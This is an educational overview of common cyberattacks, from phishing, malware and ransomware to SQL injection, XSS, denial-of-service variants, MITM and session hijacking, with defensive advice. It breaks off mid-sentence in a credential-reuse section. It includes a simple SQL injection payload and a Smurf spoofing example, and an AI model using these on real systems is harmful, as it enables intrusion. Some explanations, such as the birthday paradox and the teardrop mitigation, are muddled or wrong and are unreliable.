Cyberattacks 101

Contents
Cyberattacks 101 ................................................................................................................................. 1
Phishing Attacks.......................................................................................................................................... 3
Phishing.................................................................................................................................................... 3
Spear Phishing Attacks............................................................................................................................... 4
Whale Phishing Attack ............................................................................................................................... 5
Malware Attacks ......................................................................................................................................... 5
Ransomware ................................................................................................................................................ 7
Drive-by Attack ........................................................................................................................................... 7
Trojan Horses .............................................................................................................................................. 8
Web Attacks ................................................................................................................................................ 8
SQL Injection .............................................................................................................................................. 8
Zero-day exploit ........................................................................................................................................ 10
5. Password attack .................................................................................................................................... 10
What Is Ransomware? ............................................................................................................................. 10
How do I protect myself from ransomware? .......................................................................................... 11
Back up all your data ........................................................................................................................ 11
Patch your systems ............................................................................................................................ 11
Educate users on attack sources ...................................................................................................... 11
Protect your network ........................................................................................................................ 11
Segment network access ................................................................................................................... 11
Keep a close eye on network activity ............................................................................................... 11
Prevent initial infiltration ................................................................................................................. 11
Arm your endpoints .......................................................................................................................... 12
Gain real-time threat intelligence .................................................................................................... 12
Say no to ransom ............................................................................................................................... 12
Cross Site Scripting................................................................................................................................... 13
Denial-of-service attack ............................................................................................................................ 15
Distributed Denial-of-Service (DDoS) attack? ....................................................................................... 15
TCP SYN flood attack .............................................................................................................................. 16
Teardrop attack ........................................................................................................................................ 16

1
Smurf attack .............................................................................................................................................. 16
Ping of death attack .................................................................................................................................. 17
Botnets........................................................................................................................................................ 17
Password Attack........................................................................................................................................ 17
Eavesdropping Attack .............................................................................................................................. 18
Birthday attack.......................................................................................................................................... 19
Insider Threats .......................................................................................................................................... 20
Man-in-the-Middle (MITM) Attacks ...................................................................................................... 20
AI-Powered Attacks .................................................................................................................................. 20
Session Hijacking and Man-in-the-Middle Attacks ............................................................................... 21
IP Spoofing ................................................................................................................................................ 23
Replay ........................................................................................................................................................ 23
What is High Orbit Ion Cannon (HOIC) ...................................................................................................... 24
Attack description ................................................................................................................................. 24

2
A cyber-attack is any type of offensive action that targets computer information systems,
infrastructures, computer networks or personal computer devices, using various methods to steal,
alter or destroy data or information system

Phishing Attacks
Phishing is a type of social engineering usually employed to steal user data such as credit card
numbers and login credentials. It happens when an attacker, posing as a trusted individual, tricks
the victim to open a text message, email, or instant message. The victim is then deceived to open
a malicious link that can cause the freezing of a system as part of a ransomware attack, revealing
sensitive information, or installation of malware.

This breach can have disastrous results. For an individual, this includes identity theft, stealing of
funds, or unauthorized purchases.

Phishing is often used to obtain a foothold in governmental or corporate networks as part of a

more significant plot such as an advanced persistent threat (APT). In such a case, employees are
compromised to gain privileged access to secured data, distribute malware in a closed
environment, and to bypass security parameters.

Phishing

Phishing is the practice of sending fraudulent communications that appear to come from a
reputable source, usually through email. The goal is to steal sensitive data like credit card and
login information or to install malware on the victim’s machine. Phishing is an increasingly
common cyberthreat

Of course, chances are you wouldn't just open a random attachment or click on a link in any
email that comes your way—there has to be a compelling reason for you to take action.
Attackers know this, too. When an attacker wants you to install malware or divulge
sensitive information, they often turn to phishing tactics, or pretending to be someone or
something else to get you to take an action you normally wouldn’t. Since they rely on
human curiosity and impulses, phishing attacks can be difficult to stop.

In a phishing attack, an attacker may send you an email that appears to be from someone
you trust, like your boss or a company you do business with. The email will seem
legitimate, and it will have some urgency to it (e.g. fraudulent activity has been detected on
your account). In the email, there will be an attachment to open or a link to click. Upon
opening the malicious attachment, you’ll thereby install malware in your computer. If you
click the link, it may send you to a legitimate-looking website that asks for you to log in to
access an important file—except the website is actually a trap used to capture your
credentials when you try to log in.

In order to combat phishing attempts, understanding the importance of verifying email

senders and attachments/links is essential.

3
Spear Phishing Attacks
Spear phishing is an email aimed at a particular individual or organization, desiring unauthorized
access to crucial information. These hacks are not executed by random attackers but are most
likely done by individuals out for trade secrets, financial gain, or military intelligence.

Spear phishing emails appear to originate from an individual within the recipient’s own
organization or someone the target knows personally. Quite often, government-sponsored
hacktivists and hackers perform these activities. Cybercriminals also carry out these attacks with
the aim of reselling confidential data to private companies and governments. These attackers
employ social engineering and individually-designed approaches to effectively personalize
websites and messages.

Phishing and spear phishing attacks

Phishing attack is the practice of sending emails that appear to be from trusted sources with the
goal of gaining personal information or influencing users to do something. It combines social
engineering and technical trickery. It could involve an attachment to an email that loads malware
onto your computer. It could also be a link to an illegitimate website that can trick you into
downloading malware or handing over your personal information.

Spear phishing is a very targeted type of phishing activity. Attackers take the time to conduct
research into targets and create messages that are personal and relevant. Because of this, spear
phishing can be very hard to identify and even harder to defend against. One of the simplest
ways that a hacker can conduct a spear phishing attack is email spoofing, which is when the
information in the “From” section of the email is falsified, making it appear as if it is coming
from someone you know, such as your management or your partner company. Another technique
that scammers use to add credibility to their story is website cloning — they copy legitimate
websites to fool you into entering personally identifiable information (PII) or login credentials.

To reduce the risk of being phished, you can use these techniques:

 Critical thinking — Do not accept that an email is the real deal just because you’re busy
or stressed or you have 150 other unread messages in your inbox. Stop for a minute and
analyze the email.
 Hovering over the links — Move your mouse over the link, but do not click it! Just let
your mouse cursor over the link and see where would actually take you. Apply critical
thinking to decipher the URL.
 Analyzing email headers — Email headers define how an email got to your address.
The “Reply-to” and “Return-Path” parameters should lead to the same domain as is stated
in the email.
 Sandboxing — You can test email content in a sandbox environment, logging activity
from opening the attachment or clicking the links inside the email.

4
 Whale Phishing Attack
A whale phishing attack is a type of phishing that centers on high-profile employees such as the
CFO or CEO. It is aimed at stealing vital information since those holding higher positions in a
company have unlimited access to sensitive information. Most whaling instances manipulate the
victim into permitting high-worth wire transfers to the attacker.

The term whaling signifies the size of the attack, and whales are targeted depending on their
position within the organization. Since they are highly targeted, whaling attacks are more
difficult to notice compared to the standard phishing attacks?
In a business, system security administrators can lessen the effectiveness of such a hack by
encouraging the corporate management staff to attend security awareness training

Malware Attacks
Malware is a code that is made to stealthily affect a compromised computer system without the
consent of the user. This broad definition includes many particular types of malevolent software
(malware) such as spyware, ransomware, command, and control.

Malware is a term used to describe malicious software, including spyware, ransomware, viruses,
and worms. Malware breaches a network through a vulnerability, typically when a user clicks a
dangerous link or email attachment that then installs risky software. Once inside the system,
malware can do the following:

 Blocks access to key components of the network (ransomware)

 Installs malware or additional harmful software

 Covertly obtains information by transmitting data from the hard drive (spyware)

 Disrupts certain components and renders the system inoperable

Many well-known businesses, states, and criminal actors have been implicated of and discovered
deploying malware.

Malware differs from other software in that it can spread across a network, cause changes and
damage, remain undetectable, and be persistent in the infected system. It can destroy a network
and bring a machine’s performance to its knees.

Malicious software can be described as unwanted software that is installed in your system
without your consent. It can attach itself to legitimate code and propagate; it can lurk in useful

5
applications or replicate itself across the Internet. Here are some of the most common types of
malware:

 Macro viruses — These viruses infect applications such as Microsoft Word or Excel.
Macro viruses attach to an application’s initialization sequence. When the application is
opened, the virus executes instructions before transferring control to the application. The
virus replicates itself and attaches to other code in the computer system.
 File infectors — File infector viruses usually attach themselves to executable code, such
as .exe files. The virus is installed when the code is loaded. Another version of a file
infector associates itself with a file by creating a virus file with the same name, but an
.exe extension. Therefore, when the file is opened, the virus code will execute.
 System or boot-record infectors — A boot-record virus attaches to the master boot
record on hard disks. When the system is started, it will look at the boot sector and load
the virus into memory, where it can propagate to other disks and computers.
 Polymorphic viruses — These viruses conceal themselves through varying cycles of
encryption and decryption. The encrypted virus and an associated mutation engine are
initially decrypted by a decryption program. The virus proceeds to infect an area of code.
The mutation engine then develops a new decryption routine and the virus encrypts the
mutation engine and a copy of the virus with an algorithm corresponding to the new
decryption routine. The encrypted package of mutation engine and virus is attached to
new code, and the process repeats. Such viruses are difficult to detect but have a high
level of entropy because of the many modifications of their source code. Anti-virus
software or free tools like Process Hacker can use this feature to detect them.
 Stealth viruses — Stealth viruses take over system functions to conceal themselves.
They do this by compromising malware detection software so that the software will
report an infected area as being uninfected. These viruses conceal any increase in the size
of an infected file or changes to the file’s date and time of last modification.
 Trojans — A Trojan or a Trojan horse is a program that hides in a useful program and
usually has a malicious function. A major difference between viruses and Trojans is that
Trojans do not self-replicate. In addition to launching attacks on a system, a Trojan can
establish a back door that can be exploited by attackers. For example, a Trojan can be
programmed to open a high-numbered port so the hacker can use it to listen and then
perform an attack.
 Logic bombs — A logic bomb is a type of malicious software that is appended to an
application and is triggered by a specific occurrence, such as a logical condition or a
specific date and time.
 Worms — Worms differ from viruses in that they do not attach to a host file, but are
self-contained programs that propagate across networks and computers. Worms are
commonly spread through email attachments; opening the attachment activates the worm
program. A typical worm exploit involves the worm sending a copy of itself to every
contact in an infected computer’s email address In addition to conducting malicious
activities, a worm spreading across the internet and overloading email servers can result
in denial-of-service attacks against nodes on the network.
 Droppers — A dropper is a program used to install viruses on computers. In many
instances, the dropper is not infected with malicious code and, therefore might not be

6
 detected by virus-scanning software. A dropper can also connect to the internet and
download updates to virus software that is resident on a compromised system.
 Ransomware — Ransomware is a type of malware that blocks access to the victim’s
data and threatens to publish or delete it unless a ransom is paid. While some simple
computer ransomware can lock the system in a way that is not difficult for a
knowledgeable person to reverse, more advanced malware uses a technique called
cryptoviral extortion, which encrypts the victim’s files in a way that makes them nearly
impossible to recover without the decryption key.
 Adware — Adware is a software application used by companies for marketing purposes;
advertising banners are displayed while any program is running. Adware can be
automatically downloaded to your system while browsing any website and can be viewed
through pop-up windows or through a bar that appears on the computer screen
automatically.
 Spyware — Spyware is a type of program that is installed to collect information about
users, their computers or their browsing habits. It tracks everything you do without your
knowledge and sends the data to a remote user. It also can download and install other
malicious programs from the internet. Spyware works like adware but is usually a
separate program that is installed unknowingly when you install another freeware
application.


Ransomware
Ransomware blocks access to a victims data, typically threating delete it if a ransom is paid.
There is no guarantee that paying a ransom will regain access to the data. Ransomware is often
carried out via a Trojan delivering a payload disguised as a legitimate file.

Drive-by Attack
A drive-by attack is a common method of distributing malware.

A cyber attacker looks for an insecure website and plants a malicious script into PHP or HTTP in
one of the pages. This script can install malware into the computer that visits this website or
become an IFRAME that redirects the victim’s browser into a site controlled by the attacker. In
most cases, these scripts are obfuscated, and this makes the code to be complicated to analyze by
security researchers. These attacks are known as drive-by because they don’t require any action
on the victim’s part except visiting the compromised website. When they visit the compromised
site, they automatically and silently become infected if their computer is vulnerable to the
malware, especially if they have not applied security updates to their applications.

Drive-by download attacks are a common method of spreading malware. Hackers look for
insecure websites and plant a malicious script into HTTP or PHP code on one of the pages. This
script might install malware directly onto the computer of someone who visits the site, or it
might re-direct the victim to a site controlled by the hackers. Drive-by downloads can happen

7
when visiting a website or viewing an email message or a pop-up window. Unlike many other
types of cyber security attacks, a drive-by doesn’t rely on a user to do anything to actively enable
the attack — you don’t have to click a download button or open a malicious email attachment to
become infected. A drive-by download can take advantage of an app, operating system or web
browser that contains security flaws due to unsuccessful updates or lack of updates.

To protect yourself from drive-by attacks, you need to keep your browsers and operating systems
up to date and avoid websites that might contain malicious code. Stick to the sites you normally
use — although keep in mind that even these sites can be hacked. Don’t keep too many
unnecessary programs and apps on your device. The more plug-ins you have, the more
vulnerabilities there are that can be exploited by drive-by attacks.

Trojan Horses
A Trojan is a malicious software program that misrepresents itself to appear useful. They spread
by looking like routine software and persuading a victim to install. Trojans are considered among
the most dangerous type of all malware, as they are often designed to steal financial information.

Web Attacks
SQL Injection
SQL injection, also known as SQLI, is a kind of attack that employs malicious code to
manipulate backend databases to access information that was not intended for display. This may
include numerous items including private customer details, user lists, or sensitive company data.
A Structured Query Language (SQL) injection occurs when an attacker inserts malicious code
into a server that uses SQL and forces the server to reveal information it normally would not. An

8
attacker could carry out a SQL injection simply by submitting malicious code into a vulnerable
website search box.

SQLI can have devastating effects on a business. A successful SQLI attack can cause deletion of
entire tables, unauthorized viewing of user lists, and in some cases, the attacker can gain
administrative access to a database. These can be highly detrimental to a business. When
calculating the probable cost of SQLI, you need to consider the loss of customer trust in case
personal information like addresses, credit card details, and phone numbers are stolen.

Although SQLI can be used to attack any SQL database, the culprits often target websites.
SQL injection has become a common issue with database-driven websites. It occurs when a
malefactor executes a SQL query to the database via the input data from the client to server. SQL
commands are inserted into data-plane input (for example, instead of the login or password) in
order to run predefined SQL commands. A successful SQL injection exploit can read sensitive
data from the database, modify (insert, update or delete) database data, execute administration
operations (such as shutdown) on the database, recover the content of a given file, and, in some
cases, issue commands to the operating system.

For example, a web form on a website might request a user’s account name and then send it to
the database in order to pull up the associated account information using dynamic SQL like this:

“SELECT * FROM users WHERE account = ‘“ + userProvidedAccountNumber +”’;”

While this works for users who are properly entering their account number, it leaves a hole for
attackers. For example, if someone decided to provide an account number of “‘ or ‘1’ = ‘1’”,
that would result in a query string of:

“SELECT * FROM users WHERE account = ‘’ or ‘1’ = ‘1’;”

Because ‘1’ = ‘1’ always evaluates to TRUE, the database will return the data for all users
instead of just a single user.

The vulnerability to this type of cyber security attack depends on the fact that SQL makes no real
distinction between the control and data planes. Therefore, SQL injections work mostly if a
website uses dynamic SQL. Additionally, SQL injection is very common with PHP and ASP
applications due to the prevalence of older functional interfaces. J2EE and ASP.NET
applications are less likely to have easily exploited SQL injections because of the nature of the
programmatic interfaces available.

In order to protect yourself from a SQL injection attacks, apply least0privilege model of
permissions in your databases. Stick to stored procedures (make sure that these procedures don’t
include any dynamic SQL) and prepared statements (parameterized queries). The code that is

9
executed against the database must be strong enough to prevent injection attacks. In addition,
validate input data against a white list at the application level.

Zero-day exploit
A zero-day exploit hits after a network vulnerability is announced but before a patch or solution
is implemented. Attackers target the disclosed vulnerability during this window of time. Zero-
day vulnerability threat detection requires constant awareness.

5. Password attack
Because passwords are the most commonly used mechanism to authenticate users to an
information system, obtaining passwords is a common and effective attack approach. Access to a
person’s password can be obtained by looking around the person’s desk, ‘‘sniffing’’ the
connection to the network to acquire unencrypted passwords, using social engineering, gaining
access to a password database or outright guessing. The last approach can be done in either a
random or systematic manner:

 Brute-force password guessing means using a random approach by trying different

passwords and hoping that one work some logic can be applied by trying passwords
related to the person’s name, job title, hobbies or similar items.
 In a dictionary attack, a dictionary of common passwords is used to attempt to gain
access to a user’s computer and network. One approach is to copy an encrypted file that
contains the passwords, apply the same encryption to a dictionary of commonly used
passwords, and compare the results.

In order to protect yourself from dictionary or brute-force attacks, you need to implement an
account lockout policy that will lock the account after a few invalid password attempts. You can
follow these account lockout best practices in order to set it up correctly.

What Is Ransomware?
Ransomware is a type of malicious software, also known as malware. It encrypts a victim’s data
until the attacker is paid a predetermined ransom. Typically, the attacker demands payment in a
form of cryptocurrency such as bitcoin. Only then will the attacker send a decryption key to
release the victim’s data.
A number of ransomware variants have appeared in recent years, which we’ll describe in greater
detail below. We will also explain how you can protect your system against future attacks.

How does ransomware work?

Ransomware is typically distributed through a few main avenues. These include email phishing,
malvertising (malicious advertising), and exploit kits. After it is distributed, the ransomware

10
encrypts selected files and notifies the victim of the required payment. Watch ransomware attack
demo video.

How do I protect myself from ransomware?

Back up all your data
In the event of an attack, you can power down the endpoint, reimage it, and reinstall your recent
backup. You’ll have all your data and you’ll prevent the ransomware from spreading to other
systems.

Patch your systems

Make a habit of updating your software regularly. Patching commonly exploited third-party
software will foil many attacks.

Educate users on attack sources

The weakest link in the security chain is usually human. Educate your users on whom and what
to trust. Empower them not to fall for phishing or other schemes.

Protect your network

Take a layered approach, with security infused from the endpoint to email to the DNS layer. Use
technologies such as a next-generation firewall (NGFW) or an intrusion prevention system (IPS).

Segment network access

Limit the resources that an attacker can access. By dynamically controlling access at all times,
you help ensure that your entire network is not compromised in a single attack.

Keep a close eye on network activity

Being able to see everything happening across your network and data center can help you
uncover attacks that bypass the perimeter. Deploy a demilitarized zone (DMZ) or add a layer of
security to your local area network (LAN).

Prevent initial infiltration

Most ransomware infections occur through an email attachment or a malicious download.
Diligently block malicious websites, emails, and attachments through a layered security
approach and a company-sanctioned file-sharing program.

11
Arm your endpoints
Antivirus solutions on your endpoints don’t suffice anymore. Set up privileges so they perform
tasks such as granting the appropriate network shares or user permissions on endpoints. Two-
factor authentications will also help.

Gain real-time threat intelligence

Know your enemy. Take advantage of threat intelligence from organizations such as Talos to
understand security information and emerging cybersecurity threats.

Say no to ransom
Never, ever pay the ransom. There’s no guarantee you’ll get your data back, and you’re only
fueling the cybercriminals for more attacks.

12
SQL (pronounced “sequel”) stands for structured query language; it’s a programming
language used to communicate with databases. Many of the servers that store critical data
for websites and services use SQL to manage the data in their databases. A SQL injectio n
attack specifically targets this kind of server, using malicious code to get the server to
divulge information it normally wouldn’t. This is especially problematic if the server stores
private customer information from the website, such as credit card numbers, usernames and
passwords (credentials), or other personally identifiable information, which are tempting
and lucrative targets for an attacker.

An SQL injection attack works by exploiting any one of the known SQL vulnerabilities that
allow the SQL server to run malicious code. For example, if a SQL server is vulnerable to
an injection attack, it may be possible for an attacker to go to a website's search box and
type in code that would force the site's SQL server to dump all of its stored usernames an d
passwords for the site.

Cross Site Scripting

XSS attacks use third-party web resources to run scripts in the victim’s web browser or
scriptable application. Specifically, the attacker injects a payload with malicious JavaScript into
a website’s database. When the victim requests a page from the website, the website transmits
the page, with the attacker’s payload as part of the HTML body, to the victim’s browser, which
executes the malicious script. For example, it might send the victim’s cookie to the attacker’s
server, and the attacker can extract it and use it for session hijacking. The most dangerous
consequences occur when XSS is used to exploit additional vulnerabilities. These vulnerabilities
can enable an attacker to not only steal cookies, but also log key strokes, capture screenshots,
discover and collect network information, and remotely access and control the victim’s machine.

13
While XSS can be taken advantage of within VBScript, ActiveX and Flash, the most widely
abused is JavaScript — primarily because JavaScript is supported widely on the web.

To defend against XSS attacks, developers can sanitize data input by users in an HTTP request
before reflecting it back. Make sure all data is validated, filtered or escaped before echoing
anything back to the user, such as the values of query parameters during searches. Convert
special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded
equivalents. Give users the option to disable client-side scripts.

Cross-site scripting (XSS) is a kind of injection breach where the attacker sends malicious scripts
into content from otherwise reputable websites. It happens when a dubious source is allowed to
attach its own code into web applications, and the malicious code is bundled together with
dynamic content that is then sent to the victim’s browser.

Malicious code is usually sent in the form of pieces of Javascript code executed by the target’s
browser. The exploits can include malicious executable scripts in many languages including
Flash, HTML, Java, and Ajax. XSS attacks can be very devastating, however, alleviating the
vulnerabilities that enable these attacks is relatively simple.

In an SQL injection attack, an attacker goes after a vulnerable website to target its stored
data, such as user credentials or sensitive financial data. But if the attacker would rather
directly target a website's users, they may opt for a cross-site scripting attack. Similar to an

14
SQL injection attack, this attack also involves injecting malicious code into a website, but in
this case the website itself is not being attacked. Instead, the malicious code the attacker has
injected only runs in the user's browser when they visit the attacked website, and it goes
after the visitor directly, not the website.

One of the most common ways an attacker can deploy a cross-site scripting attack is by
injecting malicious code into a comment or a script that could automatically run. For
example, they could embed a link to a malicious JavaScript in a comment on a blog.

Cross-site scripting attacks can significantly damage a website’s reputation by placing the
users' information at risk without any indication that anything malicious even occurred. Any
sensitive information a user sends to the site—such as their credentials, credit card
information, or other private data—can be hijacked via cross-site scripting without the
website owners realizing there was even a problem in the first place.

Denial-of-service attack
A denial-of-service attack floods systems, servers, or networks with traffic to exhaust resources
and bandwidth. As a result, the system is unable to fulfill legitimate requests. Attackers can also
use multiple compromised devices to launch this attack. This is known as a distributed-denial-of-
service (DDoS) attack.

Distributed Denial-of-Service (DDoS) attack?

Denial-of-service (DDoS) aims at shutting down a network or service, causing it to be
inaccessible to its intended users. The attacks accomplish this mission by overwhelming the
target with traffic or flooding it with information that triggers a crash. In both situations, the DoS
onslaught denies legitimate users such as employees, account holders, and members of the
resource or service they expected.

DDoS attacks are often targeted at web servers of high-profile organizations such as trade
organizations and government, media companies, commerce, and banking. Although these
attacks don’t result in the loss or theft of vital information or other assets, they can cost a victim
lots of money and time to mitigate. DDoS is often used in combination to distract from other
network attacks.

Imagine you're sitting in traffic on a one-lane country road, with cars backed up as far as the
eye can see. Normally this road never sees more than a car or two, but a county fair and a
major sporting event have ended around the same time, and this road is the only way for
visitors to leave town. The road can't handle the massive amount of traffic, and as a result it
gets so backed up that pretty much no one can leave.

That's essentially what happens to a website during a denial-of-service (DoS) attack. If you
flood a website with more traffic than it was built to handle, you'll overload the website's

15
server and it'll be nigh-impossible for the website to serve up its content to visitors who are
trying to access it.

This can happen for innocuous reasons of course, say if a massive news story breaks and a
newspaper's website gets overloaded with traffic from people trying to find out more. But
often, this kind of traffic overload is malicious, as an attacker floods a website with an
overwhelming amount of traffic to essentially shut it down for all users.

In some instances, these DoS attacks are performed by many computers at the same time.
This scenario of attack is known as a Distributed Denial-of-Service Attack (DDoS). This
type of attack can be even more difficult to overcome due to the attacker appearing from
many different IP addresses around the world simultaneously, making determining the
source of the attack even more difficult for network administrators.

TCP SYN flood attack

In this attack, an attacker exploits the use of the buffer space during a Transmission Control
Protocol (TCP) session initialization handshake. The attacker’s device floods the target system’s
small in-process queue with connection requests, but it does not respond when the target system
replies to those requests. This causes the target system to time out while waiting for the response
from the attacker’s device, which makes the system crash or become unusable when the
connection queue fills up.

There are a few countermeasures to a TCP SYN flood attack:

 Place servers behind a firewall configured to stop inbound SYN packets.

 Increase the size of the connection queue and decrease the timeout on open connections.

Teardrop attack
This attack causes the length and fragmentation offset fields in sequential Internet Protocol (IP)
packets to overlap one another on the attacked host; the attacked system attempts to reconstruct
packets during the process but fails. The target system then becomes confused and crashes.

If users don’t have patches to protect against this DoS attack, disable SMBv2 and block ports
139 and 445.

Smurf attack
This attack involves using IP spoofing and the ICMP to saturate a target network with traffic.
This attack method uses ICMP echo requests targeted at broadcast IP addresses. These ICMP
requests originate from a spoofed “victim” address. For instance, if the intended victim address is
10.0.0.10, the attacker would spoof an ICMP echo request from 10.0.0.10 to the broadcast
address 10.255.255.255. This request would go to all IPs in the range, with all the responses
going back to 10.0.0.10, overwhelming the network. This process is repeatable, and can be
automated to generate huge amounts of network congestion.

16
To protect your devices from this attack, you need to disable IP-directed broadcasts at the
routers. This will prevent the ICMP echo broadcast request at the network devices. Another
option would be to configure the end systems to keep them from responding to ICMP packets
from broadcast addresses.

Ping of death attack

This type of attack uses IP packets to ‘ping a target system with an IP size over the maximum of
65,535 bytes. IP packets of this size are not allowed, so attacker fragments the IP packet. Once
the target system reassembles the packet, it can experience buffer overflows and other crashes.

Ping of death attacks can be blocked by using a firewall that will check fragmented IP packets
for maximum size.

Botnets
Botnets are the millions of systems infected with malware under hacker control in order to carry
out DDoS attacks. These bots or zombie systems are used to carry out attacks against the target
systems, often overwhelming the target system’s bandwidth and processing capabilities. These
DDoS attacks are difficult to trace because botnets are located in differing geographic locations.

Botnets can be mitigated by:

 RFC3704 filtering, which will deny traffic from spoofed addresses and help ensure that
traffic is traceable to its correct source network. For example, RFC3704 filtering will
drop packets from bogon list addresses.
 Black hole filtering, which drops undesirable traffic before it enters a protected network.
When a DDoS attack is detected, the BGP (Border Gateway Protocol) host should send
routing updates to ISP routers so that they route all traffic heading to victim servers to a
null0 interface at the next hop.
 A botnet is a network of devices that has been infected with malicious software, such as
a virus. Attackers can control a botnet as a group without the owner’s knowledge with the
goal of increasing the magnitude of their attacks. Often, a botnet is used to overwhelm
systems in a distributed-denial-of-service attack (DDoS) attack.

Password Attack
A password attack simply means an attempt to decrypt or obtain a user’s password with illegal
intentions.

Crackers can use password sniffers, dictionary attacks, and cracking programs in password
attacks. There are few defense mechanisms against password attacks, but usually, the remedy is
17
inculcating a password policy that includes a minimum length, frequent changes, and
unrecognizable words.

Password attacks are often carried out by recovering passwords stored or exported through a
computer system. The password recovery is usually done by continuously guessing the password
through a computer algorithm. The computer tries several combinations until it successfully
discovers the password.

Eavesdropping Attack
Eavesdropping attacks start with the interception of network traffic.

An Eavesdropping breach, also known as snooping or sniffing, is a network security

attack where an individual tries to steal the information that smartphones, computers and other
digital devices send or receive This hack capitalizes on unsecured network transmissions to
access the data being transmitted. Eavesdropping is difficult to detect since it doesn’t cause
abnormal data transmissions.

These attacks target weakened transmissions between the client and server that enables the
attacker to receive network transmissions. An attacker can install network monitors such as
sniffers on a server or computer to perform an eavesdropping attack and intercept data as it is
being transmitted. Any device within the transmitting and receiving network is a vulnerability
point, including the terminal and initial devices themselves. One way to protect against these
attacks is knowing what devices are connected to a particular network and what software is run
on these devices.

Eavesdropping attacks occur through the interception of network traffic. By eavesdropping, an

attacker can obtain passwords, credit card numbers and other confidential information that a user
might be sending over the network. Eavesdropping can be passive or active:

 Passive eavesdropping — A hacker detects the information by listening to the message

transmission in the network.
 Active eavesdropping — A hacker actively grabs the information by disguising himself
as friendly unit and by sending queries to transmitters. This is called probing, scanning or
tampering.

Detecting passive eavesdropping attacks is often more important than spotting active ones, since
active attacks requires the attacker to gain knowledge of the friendly units by conducting passive
eavesdropping before.

Data encryption is the best countermeasure for eavesdropping.

18
Birthday attack
The birthday attack is a statistical phenomenon that simplifies the brute-forcing of one-way
hashes. It is based on the birthday paradox that states that for a 50 percent chance that someone
shares your birthday in any room, you need 253 individuals in the room. However, for a chance
higher than 50 percent, you only require 23 people. This probability works because these
matches depend on pairs. If you choose yourself as one of the pairs, you only need 253 people to
get the required number of 253 pairs. However, if you just need matches that don’t include you,
you only need 23 people to create 253 pairs when cross-matching with each other. Thus, 253 is
the number you need to acquire a 50 percent probability of a birthday match in a room.

Birthday attacks are made against hash algorithms that are used to verify the integrity of a
message, software or digital signature. A message processed by a hash function produces a
message digest (MD) of fixed length, independent of the length of the input message; this MD
uniquely characterizes the message. The birthday attack refers to the probability of finding two
random messages that generate the same MD when processed by a hash function. If an attacker
calculates same MD for his message as the user has, he can safely replace the user’s message
with his, and the receiver will not be able to detect the replacement even if he compares MDs.

Brute-Force and Dictionary Network Attacks

Dictionary and brute-force attacks are networking attacks whereby the attacker attempts to log
into a user’s account by systematically checking and trying all possible passwords until finding
the correct one.

The simplest method to attack is through the front door since you must have a way of logging in.
If you have the required credentials, you can gain entry as a regular user without creating
suspicious logs, needing an unpatched entry, or tripping IDS signatures. If you have a system’s
credentials, your life is even simplified since attackers don’t have these luxuries.

The term brute-force means overpowering the system through repetition. When hacking
passwords, brute force requires dictionary software that combines dictionary words with
thousands of different variations. It is a slower and less glamorous process. These attacks start
with simple letters such as “a” and then move to full words such as “snoop,” or “snoopy.”

Brute-force dictionary attacks can make 100 to 1000 attempts per minute. After several hours or
days, brute-force attacks can eventually crack any password. Brute force attacks reiterate the
importance of password best practices, especially on critical resources such as network
switches, routers and servers.

19
Insider Threats
Not every network attack is performed by someone outside an organization.

Inside attacks are malicious attacks performed on a computer system or network by an individual
authorized to access the system. Insiders that carry out these attacks have the edge over external
attackers since they have authorized system access. They may also understand the system
policies and network architecture. Furthermore, there is less security against insider attacks since
most organizations focus on defending against external attacks.

Insider threats can affect all elements of computer security and range from injecting Trojan
viruses to stealing sensitive data from a network or system. The attackers may also affect the
system availability by overloading the network or computer processing capacity or computer
storage, resulting in system crashes.

Man-in-the-Middle (MITM) Attacks

Man-in-the-middle (MitM) attacks, also known as eavesdropping attacks, occur when attackers
insert themselves into a two-party transaction. Once the attackers interrupt the traffic, they can
filter and steal data.

Two common points of entry for MitM attacks:

1. On unsecure public Wi-Fi, attackers can insert themselves between a visitor’s device and the
network. Without knowing, the visitor passes all information through the attacker.

2. Once malware has breached a device, an attacker can install software to process all of the
victim’s information.

Man-in-the-middle (MITM) attacks are a type of cybersecurity breach that allows an attacker to
eavesdrop a communication between two entities. The attack occurs between two legitimate
communicating parties, enabling the attacker to intercept communication they should otherwise
not be able to access. Thus the name “man-in-the-middle.” The attacker “listens” to the
conversation by intercepting the public key message transmission and retransmits the message
while interchanging the requested key with his own.

The two parties seem to communicate as usual, without knowing the message sender is an
unknown perpetrator trying to modify and access the message before it is transmitted to the
receiver. Thus, the intruder controls the whole communication.

AI-Powered Attacks
The concept of a computer program learning by itself, building knowledge, and getting more
sophisticated may be scary.

20
Artificial intelligence can be easily dismissed as another tech buzzword. However, it is already
being employed in everyday applications through an algorithmic process referred to as machine
learning. Machine learning software is aimed at training a computer to perform particular tasks
on its own. They are taught to accomplish tasks by doing them repeatedly while learning about
certain obstacles that could hinder them.

AI can be used to hack into many systems including autonomous vehicles and drones, converting
them into potential weapons. AI makes cyber attacks such as identity theft, password cracking,
and denial-of-service attacks, automated, more powerful and efficient. It can also be used to kill
or injure people, steal money, or cause emotional harm. Larger attacks can as well be used to
affect national security, shut down hospitals, and cut power supplies to entire regions.
Be Prepared For Attacks On Your Network

Session Hijacking and Man-in-the-Middle Attacks

When you're on the internet, your computer has a lot of small back-and-forth transactions
with servers around the world letting them know who you are and requesting specific
websites or services. In return, if everything goes as it should, the web servers should
respond to your request by giving you the information you're accessing. This process, or
session, happens whether you are simply browsing or when you are logging into a website
with your username and password.

The session between your computer and the remote web server is given a unique session ID,
which should stay private between the two parties; however, an attacker can hijack the
session by capturing the session ID and posing as the computer making a request, allowing
them to log in as an unsuspecting user and gain access to unauthorized information on the
web server. There are a number of methods an attacker can use to steal the session ID, such
as a cross-site scripting attack used to hijack session IDs.

An attacker can also opt to hijack the session to insert themselves between the requesting
computer and the remote server, pretending to be the other party in the session. This allows
them to intercept information in both directions and is commonly called a man -in-the-
middle attack.

In this type of MitM attack, an attacker hijacks a session between a trusted client and network
server. The attacking computer substitutes its IP address for the trusted client while the server
continues the session, believing it is communicating with the client. For instance, the attack
might unfold like this:

1. A client connects to a server.

2. The attacker’s computer gains control of the client.
3. The attacker’s computer disconnects the client from the server.
4. The attacker’s computer replaces the client’s IP address with its own IP address and
spoofs the client’s sequence numbers.
5. The attacker’s computer continues dialog with the server and the server believes it is still
communicating with the client.
21
Credential Reuse

Users today have so many logins and passwords to remember that it’s tempting to reuse
credentials here or there to make life a little easier. Even though security best practices
universally recommend that you have unique passwords for all your applications and
websites, many people still reuse their passwords—a fact attackers rely on.

22
Once attackers have a collection of usernames and passwords from a breached website or
service (easily acquired on any number of black market websites on the internet), they know
that if they use these same credentials on other websites there’s a chance they’ll be able t o
